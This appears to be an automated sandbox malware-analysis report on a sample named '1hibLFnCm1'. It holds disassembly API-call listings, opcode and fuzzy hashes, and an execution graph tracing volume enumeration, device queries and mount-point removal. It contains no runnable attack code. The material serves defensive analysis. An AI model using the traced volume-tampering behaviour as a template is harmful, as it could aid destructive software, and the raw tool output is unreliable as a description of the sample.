                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlock
                                                      • String ID:
                                                      • API String ID: 1418687624-0
                                                      • Opcode ID: 01a384246dc268ac02439d6f0b32246a4622af30da12120cee141c8742499359
                                                      • Instruction ID: b759b48ea652a0920ecf00b7bb05f4305c6682f80546846aa29c61dca5794054
                                                      • Opcode Fuzzy Hash: 01a384246dc268ac02439d6f0b32246a4622af30da12120cee141c8742499359
                                                      • Instruction Fuzzy Hash: 649157B1900B019FC724DF74D81466ABBE4BF41322F048A2EEE5947641E775E94CDBA3
                                                      APIs
                                                      • __alloca_probe_16.LIBCMT ref: 00F6CCD8
                                                      • __alloca_probe_16.LIBCMT ref: 00F6CD99
                                                      • __freea.LIBCMT ref: 00F6CE00
                                                        • Part of subcall function 00F694CC: HeapAlloc.KERNEL32(00000000,?,?,?,00F5B1FD,?,?,00F54C93,0000000C), ref: 00F694FE
                                                      • __freea.LIBCMT ref: 00F6CE15
                                                      • __freea.LIBCMT ref: 00F6CE25
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                      • String ID:
                                                      • API String ID: 1096550386-0
                                                      • Opcode ID: 7a09279c5d3f84290fcce5716f1d4481c6d6bfcc5c5ad72891038e31d7fd83d1
                                                      • Instruction ID: 1c36e6d169b4c3f44594abdc0ba0c9c4c2b6791c26992277f896b4034b8c799c
                                                      • Opcode Fuzzy Hash: 7a09279c5d3f84290fcce5716f1d4481c6d6bfcc5c5ad72891038e31d7fd83d1
                                                      • Instruction Fuzzy Hash: C851B772A0010AAFEF259F64CC41EBB3AA9EF14764F190129FD98D7250EB35DC10A7E0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                      • String ID:
                                                      • API String ID: 3354401312-0
APIs
• __EH_prolog3.LIBCMT ref: 00F591B5
• std::_Lockit::_Lockit.LIBCPMT ref: 00F591BF
  • Part of subcall function 00F51C10: std::_Lockit::_Lockit.LIBCPMT ref: 00F51C2C
  • Part of subcall function 00F51C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00F51C49
• codecvt.LIBCPMT ref: 00F591F9
• std::_Facet_Register.LIBCPMT ref: 00F59210
• std::_Lockit::~_Lockit.LIBCPMT ref: 00F59230
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
• String ID:
• API String ID: 712880209-0
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 00F5222D
  • Part of subcall function 00F5C0D1: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F5BE3B,?,?,?,?,00F5BE3B,0000000C,00F88448,0000000C), ref: 00F5C131
Strings
Yara matches
Similarity
• API ID: ExceptionRaise___std_exception_copy
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 3109751735-1866435925
APIs
• LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00F5F563,00000000,00000001,00F8B918,?,?,?,00F5F706,00000004,InitializeCriticalSectionEx,00F7BDF0,InitializeCriticalSectionEx), ref: 00F5F5BF
• GetLastError.KERNEL32(?,00F5F563,00000000,00000001,00F8B918,?,?,?,00F5F706,00000004,InitializeCriticalSectionEx,00F7BDF0,InitializeCriticalSectionEx,00000000,?,00F5F4BD), ref: 00F5F5C9
• LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00F5E423), ref: 00F5F5F1
Strings
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
APIs
• GetConsoleOutputCP.KERNEL32(8C9F690D,00000000,00000000,00F5FC3C), ref: 00F6A5CB
  • Part of subcall function 00F6EE2B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F6CDF6,?,00000000,-00000008), ref: 00F6EED7
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F6A826
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F6A86E
• GetLastError.KERNEL32 ref: 00F6A911
Yara matches
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
APIs
Yara matches
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
APIs
  • Part of subcall function 00F6EE2B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F6CDF6,?,00000000,-00000008), ref: 00F6EED7
• GetLastError.KERNEL32 ref: 00F6F2AB
• __dosmaperr.LIBCMT ref: 00F6F2B2
• GetLastError.KERNEL32(?,?,?,?), ref: 00F6F2EC
• __dosmaperr.LIBCMT ref: 00F6F2F3
Yara matches
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00F701E5
  • Part of subcall function 00F6EE2B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F6CDF6,?,00000000,-00000008), ref: 00F6EED7
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F7021D
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F7023D
Yara matches
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
APIs
  • Part of subcall function 00F585FC: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,00F5864E,00000014,?,00F5868F,00000014,?,00F52311,00000000,00000014,00000000,00000000), ref: 00F58608
• __Mtx_unlock.LIBCPMT ref: 00F586E1
• FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,8C9F690D,?,?,?,Function_000292E8,000000FF), ref: 00F58709
• __Mtx_unlock.LIBCPMT ref: 00F58744
• __Cnd_broadcast.LIBCPMT ref: 00F58755
Yara matches
Similarity
• API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
• String ID:
• API String ID: 420990631-0
APIs
• WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00F759E1,00000000,00000001,00000000,00F5FC3C,?,00F6A965,00F5FC3C,00000000,00000000), ref: 00F77F9D
• GetLastError.KERNEL32(?,00F759E1,00000000,00000001,00000000,00F5FC3C,?,00F6A965,00F5FC3C,00000000,00000000,00F5FC3C,00F5FC3C,?,00F6AF23,?), ref: 00F77FA9
  • Part of subcall function 00F77F6F: CloseHandle.KERNEL32(FFFFFFFE,00F77FB9,?,00F759E1,00000000,00000001,00000000,00F5FC3C,?,00F6A965,00F5FC3C,00000000,00000000,00F5FC3C,00F5FC3C), ref: 00F77F7F
• ___initconout.LIBCMT ref: 00F77FB9
  • Part of subcall function 00F77F31: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F77F60,00F759CE,00F5FC3C,?,00F6A965,00F5FC3C,00000000,00000000,00F5FC3C), ref: 00F77F44
• WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00F759E1,00000000,00000001,00000000,00F5FC3C,?,00F6A965,00F5FC3C,00000000,00000000,00F5FC3C), ref: 00F77FCE
Yara matches
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
                                                      • Opcode ID: 6896b541fd9e764b173c8beadd8f6fcbf22eb21d9ff5e5e7e09c02478cbce024
                                                      • Instruction ID: 4c23aa08432ff4464048d9ec536be6837f7c6ac3cd631f65e9e77569d7e71ed2
                                                      • Opcode Fuzzy Hash: 6896b541fd9e764b173c8beadd8f6fcbf22eb21d9ff5e5e7e09c02478cbce024
                                                      • Instruction Fuzzy Hash: 50F0F836418618BBCF222F91AC04EDE3F66FF487B0B058415FA1D95120D6328960FBD2
                                                      APIs
                                                      • SleepConditionVariableCS.KERNELBASE(?,00F5B132,00000064), ref: 00F5B1B8
                                                      • LeaveCriticalSection.KERNEL32(00F8B564,00F523F1,?,00F5B132,00000064,?,00000000,000000A8,00F523F1,00F8C0A0,?,00F57026), ref: 00F5B1C2
                                                      • WaitForSingleObjectEx.KERNEL32(00F523F1,00000000,?,00F5B132,00000064,?,00000000,000000A8,00F523F1,00F8C0A0,?,00F57026), ref: 00F5B1D3
                                                      • EnterCriticalSection.KERNEL32(00F8B564,?,00F5B132,00000064,?,00000000,000000A8,00F523F1,00F8C0A0,?,00F57026), ref: 00F5B1DA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                      • String ID:
                                                      • API String ID: 3269011525-0
                                                      • Opcode ID: 8c364e7f076b92b7b1abf439b09d4a7eff69f8b792712222f57015ca99959876
                                                      • Instruction ID: 0bbe454a373bd9965bdd1ad54a529cf6e9eff94e36d3bde05c0a3f9e2dbe608a
                                                      • Opcode Fuzzy Hash: 8c364e7f076b92b7b1abf439b09d4a7eff69f8b792712222f57015ca99959876
                                                      • Instruction Fuzzy Hash: EDE0123254162CA7DA012B60EC19ADD3F25BB49762B090010FA0D5A174C7715944FBD7
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00F6418D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: dabeeac95cf17905bca50c62153568c34b703394b06de1f400539f29dd96d77c
                                                      • Instruction ID: 2efe670885c169da9105ea223c43c5ce738c063b9f1489c92e24a6471644f962
                                                      • Opcode Fuzzy Hash: dabeeac95cf17905bca50c62153568c34b703394b06de1f400539f29dd96d77c
                                                      • Instruction Fuzzy Hash: 8E517E6BE0810596CB12BB14CD5137D3BA4EB91720F304DA9F096862E9EB389CD5BA47
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00F5222D
                                                        • Part of subcall function 00F5C0D1: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F5BE3B,?,?,?,?,00F5BE3B,0000000C,00F88448,0000000C), ref: 00F5C131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise___std_exception_copy
                                                      • String ID: ios_base::badbit set$ios_base::failbit set
                                                      • API String ID: 3109751735-1240500531
                                                      • Opcode ID: b2a423ee36a0198b00908e3c296d1832fcda30939d0cd8b3677229d355c3cae4
                                                      • Instruction ID: b9a290942412476df5e04c23579053fa07ae56a8ba1bbc90be0f7e2e8413353e
                                                      • Opcode Fuzzy Hash: b2a423ee36a0198b00908e3c296d1832fcda30939d0cd8b3677229d355c3cae4
                                                      • Instruction Fuzzy Hash: C6412672504700AFC304DF28CC41A9FB7E9AF86321F188A1EFA5597652E734E949DB92
                                                      APIs
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00F5E2FF
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F5E3B3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 3480331319-1018135373
                                                      • Opcode ID: f011c1a25f0db3274ff0ffe759717a094914cadf7618662817a9ad823f297159
                                                      • Instruction ID: 23e55d0fdb9d08d17249a9f92eabb77b9d0cb1b7d357666ed6b4b02d555e5471
                                                      • Opcode Fuzzy Hash: f011c1a25f0db3274ff0ffe759717a094914cadf7618662817a9ad823f297159
                                                      • Instruction Fuzzy Hash: 1C41E730E002089BCF14DF68CC84AAE7FB5BF45325F1481A5ED199B392D735DA09DB92
                                                      APIs
                                                      • EncodePointer.KERNEL32(00000000,?), ref: 00F5EBF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID: MOC$RCC
                                                      • API String ID: 2118026453-2084237596
                                                      • Opcode ID: 78beab65a65cc2877c0e82c042758ba84fda8fb02f857b7c0e002fda3f0cafa0
                                                      • Instruction ID: 57f3f3557f1fe6a0d340943ed8ba2696e5a0cb4cf8611c376f245f7ede8d48bd
                                                      • Opcode Fuzzy Hash: 78beab65a65cc2877c0e82c042758ba84fda8fb02f857b7c0e002fda3f0cafa0
                                                      • Instruction Fuzzy Hash: 3A416872900209AFCF1ACF98CD85AEEBBB5BF48311F184099FE1466211D335DA54EB50
                                                      APIs
                                                      • __alloca_probe_16.LIBCMT ref: 00F583CA
                                                      • RaiseException.KERNEL32(?,?,?,?,?,00000000), ref: 00F583EF
                                                        • Part of subcall function 00F5C0D1: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F5BE3B,?,?,?,?,00F5BE3B,0000000C,00F88448,0000000C), ref: 00F5C131
                                                        • Part of subcall function 00F5F7B3: IsProcessorFeaturePresent.KERNEL32(00000017,00F5FC1C,?,00F5FA8F,00000001,00000016,00F61DB1,?,?,?,?,?,00000000), ref: 00F5F7CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                      • String ID: csm
                                                      • API String ID: 1924019822-1018135373
                                                      • Opcode ID: cea541d99ad7c0c2e657c417c9ffad24e1a69cc8051a095e160bfd82b4b23feb
                                                      • Instruction ID: 40b031bfdc854d37d5f5cd7cd51f8894018be1af2c6763aeab54609691a1ec54
                                                      • Opcode Fuzzy Hash: cea541d99ad7c0c2e657c417c9ffad24e1a69cc8051a095e160bfd82b4b23feb
                                                      • Instruction Fuzzy Hash: 2421A131D00218DBCF24DF95D985AAEB7B5EF04762F140009EE06BB151DB34AD4AEBC1
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00F51B05
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F51B4A
                                                        • Part of subcall function 00F58F8E: _Yarn.LIBCPMT ref: 00F58FAD
                                                        • Part of subcall function 00F58F8E: _Yarn.LIBCPMT ref: 00F58FD1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                      • String ID: bad locale name
                                                      • API String ID: 1908188788-1405518554
                                                      • Opcode ID: f61e93aeb2e222dd36bc563a17084de8656427c16616318297670a63c8ee868e
                                                      • Instruction ID: 8df799305671f045faddc3c0ccd9710e3d543aa27754554e4791ebf14aa10cc8
                                                      • Opcode Fuzzy Hash: f61e93aeb2e222dd36bc563a17084de8656427c16616318297670a63c8ee868e
                                                      • Instruction Fuzzy Hash: AFF09070511B808ED330DF358804743BEE0AF28314F044E1DD9CAC7A42E778E108CBA6

                                                      Execution Graph

                                                      Execution Coverage:32.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:8.8%
                                                      Total number of Nodes:182
                                                      Total number of Limit Nodes:5
                                                      execution_graph 388 7ff68c5e1754 CreateFileW 389 7ff68c5e17d0 DeviceIoControl 388->389 390 7ff68c5e180d 388->390 389->390 391 7ff68c5e182a FindCloseChangeNotification 390->391 392 7ff68c5e1839 390->392 391->392 393 7ff68c5e1855 FindFirstVolumeW 392->393 394 7ff68c5e183d GetLastError 392->394 393->394 405 7ff68c5e1874 393->405 454 7ff68c5e12d4 FormatMessageW 394->454 396 7ff68c5e1850 459 7ff68c5e28c0 396->459 399 7ff68c5e18a2 GetLastError 400 7ff68c5e18cd LocalAlloc 399->400 402 7ff68c5e18b5 GetLastError 399->402 404 7ff68c5e18ef GetVolumePathNamesForVolumeNameW 400->404 400->405 402->405 406 7ff68c5e190f LocalFree 404->406 409 7ff68c5e1920 404->409 407 7ff68c5e12d4 13 API calls 405->407 411 7ff68c5e198b FindNextVolumeW 405->411 427 7ff68c5e1238 405->427 406->402 407->405 410 7ff68c5e1238 13 API calls 409->410 412 7ff68c5e1238 13 API calls 409->412 419 7ff68c5e1972 LocalFree 409->419 434 7ff68c5e13b4 409->434 410->409 411->405 413 7ff68c5e19ad GetLastError 411->413 414 7ff68c5e193f LocalFree 412->414 415 7ff68c5e19e2 FindVolumeClose 413->415 416 7ff68c5e19be GetLastError 413->416 414->411 417 7ff68c5e19ff 415->417 418 7ff68c5e19f6 415->418 420 7ff68c5e12d4 13 API calls 416->420 439 7ff68c5e1348 NtQuerySystemInformation 417->439 422 7ff68c5e1238 13 API calls 418->422 424 7ff68c5e1238 13 API calls 419->424 421 7ff68c5e19d1 FindVolumeClose 420->421 421->396 422->417 424->411 467 7ff68c5e2f90 427->467 432 7ff68c5e28c0 7 API calls 433 7ff68c5e12c5 GetVolumePathNamesForVolumeNameW 432->433 433->399 433->400 435 7ff68c5e13cf 434->435 435->435 436 7ff68c5e1476 435->436 437 7ff68c5e13f3 CreateFileW 435->437 436->409 437->436 438 7ff68c5e142f DeviceIoControl CloseHandle 437->438 438->436 440 7ff68c5e138b 439->440 441 7ff68c5e28c0 7 API calls 440->441 442 7ff68c5e13a5 441->442 442->396 443 7ff68c5e1660 442->443 444 7ff68c5e168e 443->444 477 7ff68c5e1494 LocalAlloc 444->477 446 7ff68c5e28c0 7 API calls 448 7ff68c5e1735 446->448 447 7ff68c5e16ad QueryDosDeviceW 449 7ff68c5e16d9 lstrcmpW 447->449 450 7ff68c5e169a 447->450 448->396 449->450 452 7ff68c5e1701 449->452 450->447 451 7ff68c5e170e 450->451 451->446 452->451 453 7ff68c5e1238 13 API calls 452->453 453->451 455 7ff68c5e1130 5 API calls 454->455 456 7ff68c5e1328 455->456 457 7ff68c5e28c0 7 API calls 456->457 458 7ff68c5e1338 457->458 458->396 460 7ff68c5e28c9 459->460 461 7ff68c5e2920 RtlCaptureContext RtlLookupFunctionEntry 460->461 462 7ff68c5e1a1e 460->462 463 7ff68c5e2965 RtlVirtualUnwind 461->463 464 7ff68c5e29a7 461->464 463->464 484 7ff68c5e28e4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 464->484 468 7ff68c5e1254 FormatMessageW 467->468 469 7ff68c5e1130 468->469 470 7ff68c5e114f 469->470 470->470 471 7ff68c5e1162 WriteConsoleW 470->471 472 7ff68c5e118a LocalAlloc 470->472 473 7ff68c5e121c 471->473 472->473 474 7ff68c5e11a8 WideCharToMultiByte 472->474 473->432 475 7ff68c5e11e1 474->475 475->475 476 7ff68c5e11ea WriteFile LocalFree 475->476 476->473 478 7ff68c5e14e9 477->478 479 7ff68c5e14c5 NtQuerySystemInformation 478->479 482 7ff68c5e14f0 LocalFree LocalAlloc 478->482 483 7ff68c5e1519 478->483 479->478 479->483 480 7ff68c5e1523 LocalFree 481 7ff68c5e1532 480->481 481->450 482->478 483->480 483->481 553 7ff68c5e1a44 554 7ff68c5e2f90 553->554 555 7ff68c5e1a6d CreateFileW 554->555 556 7ff68c5e1ac4 DeviceIoControl CloseHandle 555->556 557 7ff68c5e1cde 555->557 556->557 558 7ff68c5e1b13 FindFirstVolumeW 556->558 560 7ff68c5e28c0 7 API calls 557->560 558->557 559 7ff68c5e1b35 558->559 562 7ff68c5e1b5f FindFirstVolumeMountPointW 559->562 564 7ff68c5e1c79 FindVolumeMountPointClose 559->564 566 7ff68c5e1baf memcpy 559->566 561 7ff68c5e1cef 560->561 562->559 563 7ff68c5e1c88 FindNextVolumeW 562->563 563->559 565 7ff68c5e1cac FindVolumeClose 563->565 564->563 565->557 567 7ff68c5e1bd5 GetVolumeNameForVolumeMountPointW 566->567 568 7ff68c5e1d11 566->568 570 7ff68c5e1cc0 FindVolumeMountPointClose FindVolumeClose 567->570 571 7ff68c5e1c08 GetVolumeNameForVolumeMountPointW 567->571 569 7ff68c5e2a98 7 API calls 568->569 572 7ff68c5e1d16 569->572 570->557 573 7ff68c5e1c55 FindNextVolumeMountPointW 571->573 574 7ff68c5e1c29 GetLastError 571->574 573->559 573->564 574->570 575 7ff68c5e1c3e RemoveDirectoryW 574->575 575->570 575->573 485 